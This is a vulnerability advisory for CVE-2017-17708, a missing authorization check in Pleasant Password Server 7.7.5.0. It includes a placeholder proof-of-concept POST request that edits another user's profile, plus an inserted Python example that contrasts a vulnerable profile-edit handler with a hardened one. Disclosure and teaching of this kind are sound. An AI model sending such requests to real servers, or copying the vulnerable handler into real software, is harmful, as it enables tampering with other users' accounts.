Profundis Labs - Security Advisory

Vulnerability Title
===================
Unauthorized write access to profile data of other users

Vendor:
=======
Pleasant Solutions Inc (http://pleasantsolutions.com/)

Product:
========
Pleasant Password Server

Pleasant Password Server is an award-winning multi-user password management tool compatible with "KeePass Password Safe" and Bruce Schneier's "Password Safe", the most popular password management systems in the world.
(Source: http://pleasantsolutions.com/passwordserver/)

Affected Versions:
==================
Version 7.7.5.0 (lower versions not tested)

Vulnerability Type:
===================
Incorrect Access Control

CVE Reference:
==============
CVE-2017-17708

VENDOR Reference:
=================
https://info.pleasantsolutions.com/Documentation/Pleasant_Password_Server/Z._Release_Notes/007.008.003
Vendor Reference Number: n.a.

Vulnerability Details:
======================
Because of insufficient authorization checks it is possible for any authenticated user to change profile data of other users.

PoC code(s):
============
POST /Account/Edit HTTP/1.1
Host: <server>:10001

__RequestVerificationToken=<token>&Id=<user id>&DisplayName=<display name>&Email=<email>&Phone=<phone>&Language=<language>

Valid user IDs can be obtained by function "User Access" -> "Add Access for User". The option box includes user id values for existing users.

Remark: Values in angle brackets are placeholders.
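The defect described in the vulnerability details is a classic missing object-level authorization check: the handler authenticates the caller but then acts on whichever record the request's Id parameter names. The following is an added example (not Pleasant Solutions' code, and not taken from the advisory) that shows the vulnerable pattern next to the hardened one. The in-memory user store, the `User` dataclass, the handler names and the sample form dictionaries are all constructed for this illustration; only the field names (Id, DisplayName, Email, Phone, Language) come from the advisory.

```python
"""Added example (not the vendor's code): object-level authorization for a
profile-edit handler, mirroring the parameters named in CVE-2017-17708.

The user store, dataclass, and handler names are constructed for this
illustration and are not Pleasant Password Server's implementation.
"""
from dataclasses import dataclass


@dataclass
class User:
    id: int
    display_name: str
    email: str
    phone: str = ""
    language: str = "en"
    is_admin: bool = False


class Forbidden(Exception):
    """Raised when the caller is not allowed to act on the requested record."""


def make_users() -> dict:
    """Constructed sample data standing in for the application's user table."""
    return {
        1: User(1, "Alice", "alice@example.invalid"),
        2: User(2, "Bob", "bob@example.invalid"),
        3: User(3, "Admin", "admin@example.invalid", is_admin=True),
    }


def _apply_edit(user: User, form: dict) -> User:
    """Copy only the whitelisted profile fields from the form onto the record."""
    user.display_name = form.get("DisplayName", user.display_name)
    user.email = form.get("Email", user.email)
    user.phone = form.get("Phone", user.phone)
    user.language = form.get("Language", user.language)
    return user


def edit_profile_vulnerable(session_user_id: int, users: dict, form: dict) -> User:
    """The pattern behind the advisory: the caller is authenticated (we know
    session_user_id), but the record to edit is chosen solely from the
    client-supplied Id, so any logged-in user can overwrite anyone's profile."""
    target = users[int(form["Id"])]          # trusts the request body
    return _apply_edit(target, form)


def edit_profile_hardened(session_user_id: int, users: dict, form: dict) -> User:
    """Fix: the authorization decision is derived server-side from the session.
    A user may edit only their own record; an administrator may edit any record.
    Anything else is rejected before a single field is written."""
    caller = users[session_user_id]
    target_id = int(form["Id"])
    if target_id != caller.id and not caller.is_admin:
        # In a real service this is the place to emit an audit/security log
        # event: a mismatch between session identity and requested Id is a
        # strong signal worth alerting on.
        raise Forbidden(f"user {caller.id} may not edit profile {target_id}")
    return _apply_edit(users[target_id], form)


def is_rejected(session_user_id: int, users: dict, form: dict) -> bool:
    """Helper for tests/demos: True if the hardened handler refuses the edit."""
    try:
        edit_profile_hardened(session_user_id, users, form)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    store = make_users()
    edit_profile_vulnerable(2, store, {"Id": "1", "DisplayName": "changed by Bob"})
    print("vulnerable handler let user 2 rename user 1 to:", store[1].display_name)
    store = make_users()
    print("hardened handler rejects the same request:",
          is_rejected(2, store, {"Id": "1", "DisplayName": "changed by Bob"}))
```

Two design points worth noting. First, the anti-forgery token in the PoC request (`__RequestVerificationToken`) is a CSRF defence, not an authorization control: it does nothing against a legitimately logged-in user who submits the form for a different Id, which is exactly this vulnerability's preconditions (PR:L in the CVSS vector). Second, the safest variant of the hardened handler does not read Id from the form at all for the self-edit case and only accepts an explicit Id on a separate, admin-only route; the version above keeps the advisory's request shape so the check is visible.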
Disclosure Timeline:
====================
Vendor Notification:   12/19/2017
Vendor Confirmation:   12/20/2017
Vendor Patch Release:  03/01/2018
Public Disclosure:     06/22/2018

Severity Level:
===============
6.5 (Medium)
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Description:
============
Request Method(s):
[+] HTTP POST

Vulnerable Product:
[+] Pleasant Password Server 7.7.5.0

Vulnerable Parameter(s):
[+] Id

Authentication (Role):
[+] User

===========================================================
[+] Author: Philipp Rocholl
[+] Website: https://www.profundis-labs.com
[+] Source: https://profundis-labs.com/advisories/CVE-2017-17708.txt

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of security related information.